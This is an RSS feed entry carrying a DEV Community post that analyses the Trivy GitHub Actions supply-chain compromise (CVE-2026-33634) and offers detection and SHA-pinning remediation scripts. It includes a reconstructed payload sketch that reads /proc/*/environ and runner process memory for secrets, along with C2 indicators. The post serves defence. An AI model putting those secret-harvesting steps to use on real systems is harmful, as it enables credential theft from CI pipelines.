<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: daniel jeong</title>
    <description>The latest articles on DEV Community by daniel jeong (@x4nent).</description>
    <link>https://dev.to/x4nent</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3847714%2Fa00caf55-e9ba-4ee1-91a9-ac154d40925d.jpeg</url>
      <title>DEV Community: daniel jeong</title>
      <link>https://dev.to/x4nent</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/x4nent"/>
    <language>en</language>
    <item>
      <title>Inside the Trivy Supply Chain Compromise (CVE-2026-33634): 76 Hijacked Tags, Runner.Worker Memory Secret Theft &amp; SHA Pinning</title>
      <dc:creator>daniel jeong</dc:creator>
      <pubDate>Wed, 03 Jun 2026 23:40:21 +0000</pubDate>
      <link>https://dev.to/x4nent/inside-the-trivy-supply-chain-compromise-cve-2026-33634-76-hijacked-tags-runnerworker-memory-l1j</link>
      <guid>https://dev.to/x4nent/inside-the-trivy-supply-chain-compromise-cve-2026-33634-76-hijacked-tags-runnerworker-memory-l1j</guid>
      <description>&lt;p&gt;What happens when the security scanner meant to protect your pipeline turns into the malware that steals your secrets? On March 19, 2026, that is exactly what happened to &lt;strong&gt;Trivy&lt;/strong&gt; (aquasecurity). Trivy is the most widely adopted open-source vulnerability scanner in the cloud-native ecosystem, embedded in thousands of CI/CD pipelines as the &lt;code&gt;aquasecurity/trivy-action&lt;/code&gt; GitHub Action — and &lt;strong&gt;by design it has access to pipeline secrets&lt;/strong&gt;. Compromise a tool like that, and the attacker doesn't just get code: they get cloud credentials, SSH keys, and Kubernetes tokens — everything the pipeline touches.&lt;/p&gt;

&lt;p&gt;This post breaks down the official advisory &lt;strong&gt;GHSA-69fq-xp46-6x23&lt;/strong&gt; (CVE-2026-33634, Critical) as the primary source: what happened, how the payload worked, and the SHA-pinning-based remediation ManoIT applied to its internal pipelines.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj1duzx65aep8oxilg2cb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fj1duzx65aep8oxilg2cb.png" alt="Trivy supply chain attack chain" width="799" height="373"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  1. What Happened — When a Security Tool Becomes the Weapon
&lt;/h2&gt;

&lt;p&gt;This was not a single poisoned package. It was a &lt;strong&gt;multi-channel campaign that hit GitHub Actions, release binaries, Docker Hub images, and package repositories&lt;/strong&gt;. The threat actor, &lt;strong&gt;TeamPCP&lt;/strong&gt; (the payload calls itself "TeamPCP Cloud Stealer"), force-pushed &lt;strong&gt;76 of 77 tags&lt;/strong&gt; in &lt;code&gt;aquasecurity/trivy-action&lt;/code&gt; and &lt;strong&gt;all 7 tags&lt;/strong&gt; in &lt;code&gt;aquasecurity/setup-trivy&lt;/code&gt; to malicious commits at 17:43 UTC on March 19. Less than an hour later, at 18:22 UTC, a forged &lt;strong&gt;v0.69.4&lt;/strong&gt; binary was distributed across GitHub Releases, GHCR, Docker Hub, ECR Public, deb/rpm packages, and &lt;code&gt;get.trivy.dev&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;It didn't stop there. Three days later, on March 22, the attacker used &lt;strong&gt;separately stolen Docker Hub credentials&lt;/strong&gt; to push malicious &lt;code&gt;v0.69.5&lt;/code&gt;, &lt;code&gt;v0.69.6&lt;/code&gt;, and &lt;code&gt;latest&lt;/code&gt; images, bypassing GitHub-based controls entirely. The same day, using a service account token (&lt;code&gt;Argon-DevOps-Mgt&lt;/code&gt;) bridging two GitHub orgs, they defaced &lt;strong&gt;all 44 repositories&lt;/strong&gt; in Aqua Security's &lt;code&gt;aquasec-com&lt;/code&gt; org with a &lt;code&gt;tpcp-docs-&lt;/code&gt; prefix and exposed proprietary source.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Time (UTC)&lt;/th&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;Channel&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Late Feb – 3/1&lt;/td&gt;
&lt;td&gt;Initial breach, partial (non-atomic) credential rotation&lt;/td&gt;
&lt;td&gt;Release infra&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3/19 17:43&lt;/td&gt;
&lt;td&gt;trivy-action 76 + setup-trivy 7 tags force-pushed&lt;/td&gt;
&lt;td&gt;GitHub Actions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3/19 18:22&lt;/td&gt;
&lt;td&gt;Forged v0.69.4 binary distributed (~3h exposure)&lt;/td&gt;
&lt;td&gt;All channels&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3/20 05:40&lt;/td&gt;
&lt;td&gt;trivy-action tags restored (~12h exposure closed)&lt;/td&gt;
&lt;td&gt;GitHub Actions&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3/22&lt;/td&gt;
&lt;td&gt;v0.69.5/v0.69.6/latest images (~10h), 44 repos defaced&lt;/td&gt;
&lt;td&gt;Docker Hub&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
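
&lt;p&gt;The trivy-action window in the table (3/19 17:43 to 3/20 05:40 UTC) is the only one whose start and end are both stated, so it translates directly into a triage check for workflow runs. The sketch below is a hypothetical helper (&lt;code&gt;in_trivy_action_window&lt;/code&gt; is not part of any tool); it assumes timestamps in the &lt;code&gt;2026-03-19T18:05:12Z&lt;/code&gt; form that &lt;code&gt;gh run list --json createdAt&lt;/code&gt; returns, without fractional seconds. The other channels had different windows and would need their own bounds.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Sketch: does a UTC timestamp fall inside the trivy-action tag-hijack window?
# Bounds come from the timeline table; other channels need their own windows.
WINDOW_START=20260319174300   # 3/19 17:43 UTC: tags force-pushed
WINDOW_END=20260320054000     # 3/20 05:40 UTC: tags restored

in_trivy_action_window() {
  local ts
  # 2026-03-19T18:05:12Z becomes 20260319180512, which compares as an integer
  ts=$(printf '%s' "$1" | tr -d 'TZ:-')
  if [ "$ts" -lt "$WINDOW_START" ]; then
    return 1
  fi
  [ "$ts" -le "$WINDOW_END" ]
}

# Usage (ORG/REPO is a placeholder):
#   gh run list --repo ORG/REPO --created 2026-03-19..2026-03-20 --limit 1000 \
#     --json createdAt,databaseId --jq '.[] | "\(.createdAt) \(.databaseId)"' |
#   while read -r ts id; do
#     if in_trivy_action_window "$ts"; then echo "check run $id"; fi
#   done
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Stripping the separators keeps the comparison to plain integer tests, which avoids depending on GNU-specific &lt;code&gt;date&lt;/code&gt; parsing.&lt;/p&gt;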

&lt;h2&gt;
  
  
  2. Root Cause — Non-Atomic Credential Rotation
&lt;/h2&gt;

&lt;p&gt;The March incident didn't come out of nowhere — it was a &lt;strong&gt;continuation of a supply chain attack that began in late February 2026&lt;/strong&gt;. After the initial disclosure on March 1, credential rotation was performed but &lt;strong&gt;was not atomic&lt;/strong&gt; — not all credentials were revoked simultaneously. While rotation dragged on over several days, the attacker used still-valid tokens to &lt;strong&gt;re-exfiltrate the newly rotated secrets&lt;/strong&gt;, retaining the residual access that enabled the March 19 attack.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ Caution: In incident response, "we rotated the credentials" is not sufficient. The &lt;strong&gt;window between revocation and reissue&lt;/strong&gt; becomes the channel for the second breach. Rotation must be atomic — bulk-invalidate old credentials and issue new ones as a single unit of work.&lt;/p&gt;
&lt;/blockquote&gt;
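
&lt;p&gt;One way to make "atomic" concrete is an ordering rule: revoke every old credential, prove none still works, and only then issue replacements, aborting at the first failure. The sketch below assumes three hypothetical hooks (&lt;code&gt;revoke_cred&lt;/code&gt;, &lt;code&gt;cred_is_valid&lt;/code&gt;, &lt;code&gt;issue_cred&lt;/code&gt;) that you would wire to each provider's real API; the stubs at the bottom exist only so the sketch runs.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Sketch: rotation as "revoke all, verify, then issue", aborting on the first failure.
# revoke_cred, cred_is_valid and issue_cred are HYPOTHETICAL hooks; wire them to
# the real APIs of each provider (GitHub, cloud IAM, registries, and so on).
rotate_all() {
  local cred
  # Phase 1: revoke every old credential before any replacement exists.
  for cred in "$@"; do
    revoke_cred "$cred" || { echo "ABORT: revoke failed for $cred"; return 1; }
  done
  # Phase 2: prove none of the old credentials still works.
  for cred in "$@"; do
    if cred_is_valid "$cred"; then
      echo "ABORT: $cred still valid after revoke"
      return 1
    fi
  done
  # Phase 3: only now issue the replacements.
  for cred in "$@"; do
    issue_cred "$cred" || { echo "ABORT: issue failed for $cred"; return 1; }
  done
  echo "rotated: $*"
}

# Demo-only stubs so the sketch runs; they just track revoked names in a string.
REVOKED=""
revoke_cred()   { REVOKED="$REVOKED $1"; }
cred_is_valid() { case " $REVOKED " in *" $1 "*) return 1 ;; *) return 0 ;; esac; }
issue_cred()    { :; }

rotate_all github-pat aws-key dockerhub-token   # prints: rotated: github-pat aws-key dockerhub-token
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The deliberate trade-off is a short outage between revoke and reissue: no new secret is issued while an old token might still be valid, which is exactly the window the attacker exploited.&lt;/p&gt;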

&lt;h2&gt;
  
  
  3. Breaking Down the Attack
&lt;/h2&gt;

&lt;h3&gt;
  
  
  3.1 trivy-action Tag Hijacking: &lt;code&gt;@0.34.0&lt;/code&gt; Is a Pointer, Not a Contract
&lt;/h3&gt;

&lt;p&gt;The core of this attack abused &lt;strong&gt;two by-design properties&lt;/strong&gt; of Git and GitHub: &lt;strong&gt;mutable tags&lt;/strong&gt; and &lt;strong&gt;self-declared commit identity&lt;/strong&gt;. By default, tags are not immutable references. Anyone with push access can repoint an existing tag to an entirely different commit. The attacker force-pushed 76 tags to malicious commits and injected the payload into &lt;code&gt;entrypoint.sh&lt;/code&gt; so it &lt;strong&gt;ran immediately before the legitimate Trivy scan&lt;/strong&gt;. Pipelines looked normal while the stealer ran silently underneath. The imposter commits spoofed maintainer identities, but GitHub flagged them with &lt;em&gt;"This commit does not belong to any branch on this repository."&lt;/em&gt;&lt;/p&gt;
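
&lt;p&gt;Both properties are easy to reproduce locally. The throwaway demo below is a sketch that assumes &lt;code&gt;git&lt;/code&gt; is installed; the tag name and the "maintainer" identity are made up. It commits under a self-declared identity, tags the commit, then builds an off-branch imposter commit and force-moves the same tag onto it. The tag name never changes, but the commit it resolves to does, and no branch contains the new target.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Demo: a Git tag is a movable pointer, and commit authorship is self-declared.
demo_tag_hijack() (
  # Subshell body: the cd and the cleanup trap stay local to this function.
  set -e
  repo=$(mktemp -d)
  trap 'rm -rf "$repo"' EXIT
  cd "$repo"
  git init -q

  # Git records whatever name/email it is given; nothing verifies them.
  g() { git -c commit.gpgsign=false -c user.name="Trusted Maintainer" -c user.email=maintainer@example.com "$@"; }

  g commit -q --allow-empty -m "legitimate release"
  git tag 0.34.0
  before=$(git rev-parse 0.34.0)

  # Imposter commit built with commit-tree: it exists, but no branch points at it.
  imposter=$(g commit-tree -p HEAD -m "imposter" "HEAD^{tree}")
  git tag -f 0.34.0 "$imposter"   # same name, new target (a force-push does this remotely)
  after=$(git rev-parse 0.34.0)

  branches=$(git branch --contains "$after")
  echo "before=$before"
  echo "after=$after"
  echo "branches_containing_after=${branches:-none}"
)

demo_tag_hijack
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;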

&lt;h3&gt;
  
  
  3.2 Forging the v0.69.4 Binary — goreleaser &lt;code&gt;--skip=validate&lt;/code&gt;
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;1) Push commit 1885610c
   -&amp;gt; swap actions/checkout reference to imposter commit 70379aad
   -&amp;gt; composite action that downloads malicious Go source from a typosquatted domain
2) Add --skip=validate to goreleaser -&amp;gt; skip goreleaser's pre-release validation checks
3) Tag that commit as v0.69.4 -&amp;gt; trigger the release pipeline
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;A single flag (&lt;code&gt;--skip=validate&lt;/code&gt;) that turns off goreleaser's validation step was enough to push the forged build through the normal release pipeline.&lt;/p&gt;
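
&lt;p&gt;A cheap countermeasure is to refuse any release command that disables that step. The sketch below is a hypothetical CI guard, not a goreleaser feature: it reads workflow or script text on stdin and fails if it finds &lt;code&gt;--skip=validate&lt;/code&gt;, a comma list containing &lt;code&gt;validate&lt;/code&gt;, or the older &lt;code&gt;--skip-validate&lt;/code&gt; spelling. A pattern match is easy to evade, so treat it as a tripwire rather than a control by itself.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Sketch: CI tripwire for release commands that disable goreleaser's validate step.
release_guard() {
  # Matches --skip=validate, --skip validate, --skip=publish,validate and --skip-validate;
  # grep -n prints each offending line with its line number.
  if grep -nE -- '--skip([= ]+([a-z-]+,)*|-)validate'; then
    echo "BLOCKED: goreleaser validation is being skipped"
    return 1
  fi
  echo "ok"
}

# Usage (workflow path is an assumption about your repo layout):
#   cat .github/workflows/*.yml | release_guard
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;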

&lt;h3&gt;
  
  
  3.3 The Payload — Reading Secrets Straight Out of Runner.Worker Memory
&lt;/h3&gt;

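&lt;p&gt;The most dangerous technique &lt;strong&gt;sidestepped GitHub Actions' secret masking&lt;/strong&gt; entirely. Masking only redacts secret values in log output; the values themselves still sit in plaintext in the runner's memory.&lt;br&gt;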
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Payload behavior (reconstructed)&lt;/span&gt;
&lt;span class="c"&gt;# 1) Scan environment variables of all runner processes&lt;/span&gt;
&lt;span class="nb"&gt;cat&lt;/span&gt; /proc/&lt;span class="k"&gt;*&lt;/span&gt;/environ          &lt;span class="c"&gt;# first-pass collection of SSH keys / env secrets&lt;/span&gt;

&lt;span class="c"&gt;# 2) Key technique: read the Runner.Worker process memory directly&lt;/span&gt;
&lt;span class="c"&gt;#    A base64-encoded Python payload targets values marked isSecret:true&lt;/span&gt;
&lt;span class="c"&gt;#    -&amp;gt; secrets that show as *** in logs are extracted in plaintext from memory&lt;/span&gt;
python3 &lt;span class="nt"&gt;-c&lt;/span&gt; &lt;span class="s1"&gt;'... read /proc/&amp;lt;worker_pid&amp;gt;/mem ...'&lt;/span&gt;

&lt;span class="c"&gt;# 3) Sweep 50+ paths: AWS/GCP/Azure tokens, k8s configs,&lt;/span&gt;
&lt;span class="c"&gt;#    Docker configs, Terraform state, Git credentials, wallets, shell history&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Collected data was &lt;strong&gt;hybrid-encrypted with AES-256-CBC and RSA-4096&lt;/strong&gt; and exfiltrated via HTTPS POST to the C2 domain &lt;code&gt;scan[.]aquasecurtiy[.]org&lt;/code&gt;, a typosquat of Aqua's name hosted at &lt;code&gt;45.148.10.212&lt;/code&gt; in Amsterdam. If the C2 was unreachable and a GitHub PAT was present, the malware &lt;strong&gt;created a public &lt;code&gt;tpcp-docs&lt;/code&gt; repository on the victim's account and uploaded the stolen data as release assets&lt;/strong&gt;, turning GitHub itself into the exfiltration channel.&lt;/p&gt;

&lt;h2&gt;
  
  
  4. Affected vs. Safe Versions
&lt;/h2&gt;

&lt;p&gt;The lesson is blunt: &lt;strong&gt;the safe reference is a full commit SHA, not a version tag&lt;/strong&gt;. Why the safe versions stayed safe is also telling: v0.69.3 and trivy-action v0.35.0 were protected by &lt;strong&gt;GitHub Immutable Releases&lt;/strong&gt;, enabled on 3/3 and 3/4, before the attack.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;Affected&lt;/th&gt;
&lt;th&gt;Exposure&lt;/th&gt;
&lt;th&gt;Safe&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;trivy binary&lt;/td&gt;
&lt;td&gt;v0.69.4&lt;/td&gt;
&lt;td&gt;~3h (3/19)&lt;/td&gt;
&lt;td&gt;v0.69.3 or earlier&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;trivy (Docker Hub)&lt;/td&gt;
&lt;td&gt;v0.69.5, v0.69.6, latest&lt;/td&gt;
&lt;td&gt;~10h (3/22–24)&lt;/td&gt;
&lt;td&gt;v0.69.3 or earlier (digest-pinned)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;trivy-action&lt;/td&gt;
&lt;td&gt;tags 0.0.1–0.34.2 (76)&lt;/td&gt;
&lt;td&gt;~12h (3/19–20)&lt;/td&gt;
&lt;td&gt;v0.35.0 (&lt;code&gt;57a97c7&lt;/code&gt;) or SHA-pinned&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;setup-trivy&lt;/td&gt;
&lt;td&gt;all releases&lt;/td&gt;
&lt;td&gt;~4h (3/19)&lt;/td&gt;
&lt;td&gt;v0.2.6 (&lt;code&gt;3fb12ec&lt;/code&gt;) or SHA-pinned&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;blockquote&gt;
&lt;p&gt;⚠️ Caution: A malicious &lt;code&gt;v0.70.0&lt;/code&gt; push was stopped just before the tag landed, so treat any v0.70.0 reference in logs as suspicious. Also, &lt;code&gt;mirror.gcr.io&lt;/code&gt; may still serve cached malicious images, so reference images by &lt;strong&gt;digest (&lt;code&gt;@sha256:...&lt;/code&gt;)&lt;/strong&gt;. Because immutable releases now lock the force-pushed tag names (&lt;code&gt;0.0.1&lt;/code&gt;–&lt;code&gt;0.34.2&lt;/code&gt;), those versions could not be recreated under the same names and were re-published with a &lt;code&gt;v&lt;/code&gt; prefix.&lt;/p&gt;
&lt;/blockquote&gt;
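
&lt;p&gt;Checking that every image reference is digest-pinned is mechanical. The helper below is a hypothetical sketch that treats a reference as pinned only when it ends in &lt;code&gt;@sha256:&lt;/code&gt; followed by 64 lowercase hex characters. A tag may still appear in front of the digest (&lt;code&gt;image:tag@sha256:...&lt;/code&gt;); in that form the digest is what gets pulled.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Sketch: classify container image references as digest-pinned or mutable.
image_ref_kind() {
  if printf '%s\n' "$1" | grep -qE '@sha256:[0-9a-f]{64}$'; then
    echo "pinned"
  else
    echo "MUTABLE"   # a tag such as :latest or :0.69.3 can be re-pushed
  fi
}

image_ref_kind aquasec/trivy:latest   # prints MUTABLE
image_ref_kind aquasec/trivy:0.69.3   # prints MUTABLE
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;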

&lt;h2&gt;
  
  
  5. Detection &amp;amp; Response Playbook
&lt;/h2&gt;

&lt;p&gt;You need a fast answer to "were we exposed, and if so, what do we rotate?" Treat &lt;strong&gt;every secret accessible to a workflow that ran a compromised version&lt;/strong&gt; during the exposure windows as compromised.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# 1) Fallback exfil trace -- search org for tpcp-docs repos (presence = successful exfil)&lt;/span&gt;
gh repo list &amp;lt;ORG&amp;gt; &lt;span class="nt"&gt;--limit&lt;/span&gt; 1000 &lt;span class="nt"&gt;--json&lt;/span&gt; name &lt;span class="se"&gt;\&lt;/span&gt;
  | jq &lt;span class="nt"&gt;-r&lt;/span&gt; &lt;span class="s1"&gt;'.[].name'&lt;/span&gt; | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-i&lt;/span&gt; &lt;span class="s1"&gt;'tpcp-docs'&lt;/span&gt;

&lt;span class="c"&gt;# 2) Check 3/19-20 workflow run logs for trivy-action tag references&lt;/span&gt;
gh run list &lt;span class="nt"&gt;--repo&lt;/span&gt; &amp;lt;ORG&amp;gt;/&amp;lt;REPO&amp;gt; &lt;span class="nt"&gt;--created&lt;/span&gt; 2026-03-19..2026-03-20 &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--json&lt;/span&gt; databaseId,workflowName,createdAt

&lt;span class="c"&gt;# 3) Block C2 indicators at the network level + review historical connections&lt;/span&gt;
&lt;span class="c"&gt;#    domain: scan[.]aquasecurtiy[.]org   IP: 45.148.10.212&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
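
&lt;p&gt;For step 3's historical review, the two network indicators can be grepped out of whatever proxy, DNS, or firewall logs you retain. A minimal sketch, assuming plain-text logs on stdin (the function name is hypothetical and the log path in the usage comment is only an example):&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Sketch: print log lines (with line numbers) that mention the advisory's C2 indicators.
ioc_hits() {
  # Dots are escaped; the IP is bounded so that e.g. 145.148.10.212 does not match.
  if ! grep -nE 'scan\.aquasecurtiy\.org|(^|[^0-9])45\.148\.10\.212([^0-9]|$)'; then
    echo "no IoC hits"
  fi
}

# Usage (example path):
#   cat /var/log/squid/access.log | ioc_hits
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;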



&lt;p&gt;Then &lt;strong&gt;rotate all potentially exposed secrets atomically&lt;/strong&gt;: GitHub tokens, cloud provider credentials, registry tokens, SSH keys, DB passwords. Audit for secondary compromise — unauthorized repos, unexpected workflow runs, infrastructure changes.&lt;/p&gt;

&lt;h2&gt;
  
  
  6. The Real Fix — SHA Pinning and Immutable Releases
&lt;/h2&gt;

&lt;p&gt;The single most important lesson: &lt;strong&gt;mutable tags are a liability.&lt;/strong&gt; Pin every third-party Action to a &lt;strong&gt;full commit SHA&lt;/strong&gt;; then, even if a tag is repointed via force-push, your workflow still runs only the commit you intended.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="c1"&gt;# BAD -- mutable tag (can be force-pushed at any time)&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aquasecurity/trivy-action@0.34.0&lt;/span&gt;

&lt;span class="c1"&gt;# GOOD -- full commit SHA pin + comment for version readability&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aquasecurity/trivy-action@57a97c7&lt;/span&gt;  &lt;span class="c1"&gt;# v0.35.0&lt;/span&gt;
  &lt;span class="na"&gt;with&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;scan-type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;fs'&lt;/span&gt;
    &lt;span class="na"&gt;severity&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;CRITICAL,HIGH'&lt;/span&gt;
&lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;uses&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;aquasecurity/setup-trivy@3fb12ec&lt;/span&gt;    &lt;span class="c1"&gt;# v0.2.6&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
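
&lt;p&gt;Auditing existing workflows for mutable references can be scripted. The sketch below is a hypothetical helper with a deliberately simple line-based parse rather than a YAML parser: it reads workflow YAML on stdin and reports every &lt;code&gt;uses:&lt;/code&gt; reference whose ref is not a full 40-character commit SHA. It also flags abbreviated SHAs such as &lt;code&gt;@57a97c7&lt;/code&gt;, since only the full-length SHA identifies a commit unambiguously and GitHub's hardening guidance is to pin the full SHA.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Sketch: list "uses:" references that are not pinned to a full commit SHA.
unpinned_uses() {
  grep -oE 'uses:[[:space:]]*[^[:space:]#]+' |
    sed -E 's/^uses:[[:space:]]*//' |
    tr -d "\"'" |
    while read -r ref; do
      case "$ref" in
        ./*|docker://*) continue ;;   # local actions / docker images are out of scope here
      esac
      sha=${ref##*@}                  # text after the last @ (whole ref if there is none)
      if ! printf '%s\n' "$sha" | grep -qE '^[0-9a-f]{40}$'; then
        echo "UNPINNED: $ref"
      fi
    done
}

# Usage:
#   cat .github/workflows/*.yml | unpinned_uses
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;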



&lt;p&gt;Verify binaries and images with &lt;strong&gt;sigstore signatures&lt;/strong&gt;, confirming both integrity and signing time (that it was signed before the 3/19 attack).&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# sigstore verification for the binary&lt;/span&gt;
cosign verify-blob &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-identity-regexp&lt;/span&gt; &lt;span class="s1"&gt;'https://github\.com/aquasecurity/'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--certificate-oidc-issuer&lt;/span&gt; &lt;span class="s1"&gt;'https://token.actions.githubusercontent.com'&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nt"&gt;--bundle&lt;/span&gt; trivy_0.69.2_Linux-64bit.tar.gz.sigstore.json &lt;span class="se"&gt;\&lt;/span&gt;
  trivy_0.69.2_Linux-64bit.tar.gz
&lt;span class="c"&gt;# Verified OK  -&amp;gt; additionally confirm the signing time predates the 3/19 attack&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
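
&lt;p&gt;The signing-time half of that check can be scripted too. Sigstore bundles record when the signature entered the Rekor transparency log as &lt;code&gt;integratedTime&lt;/code&gt; (Unix seconds). The sketch below assumes that field is present in the bundle and pulls the first occurrence with &lt;code&gt;grep&lt;/code&gt; to avoid a &lt;code&gt;jq&lt;/code&gt; dependency. Run it only after &lt;code&gt;cosign verify-blob&lt;/code&gt; succeeds, since it does not check signatures itself; the helper name and the cutoff constant are illustrative.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;#!/usr/bin/env bash
# Sketch: after cosign verify-blob succeeds, check that the bundle's transparency-log
# time (integratedTime, Unix seconds) predates the attack.
ATTACK_START=1773942180   # 2026-03-19T17:43:00Z, when the trivy-action tags were hijacked

signed_before_attack() {
  local bundle=$1 t
  # First integratedTime in the bundle; tolerates both "123" and 123 JSON forms.
  t=$(grep -oE '"integratedTime"[[:space:]]*:[[:space:]]*"?[0-9]+' "$bundle" |
        grep -oE '[0-9]+$' | head -n 1)
  if [ -z "$t" ]; then
    echo "UNKNOWN: no integratedTime in $bundle"
    return 2
  fi
  if [ "$t" -lt "$ATTACK_START" ]; then
    echo "OK: signed at $t, before the attack"
  else
    echo "SUSPECT: signed at $t, at or after the attack start"
    return 1
  fi
}

# Usage:
#   signed_before_attack trivy_0.69.2_Linux-64bit.tar.gz.sigstore.json
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The cutoff here is the 3/19 tag hijack. Since the initial breach dates back to late February, a stricter team may prefer an earlier cutoff.&lt;/p&gt;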



&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Defense layer&lt;/th&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;th&gt;Attack surface closed&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Reference immutability&lt;/td&gt;
&lt;td&gt;Pin Actions to full SHA, images to digest&lt;/td&gt;
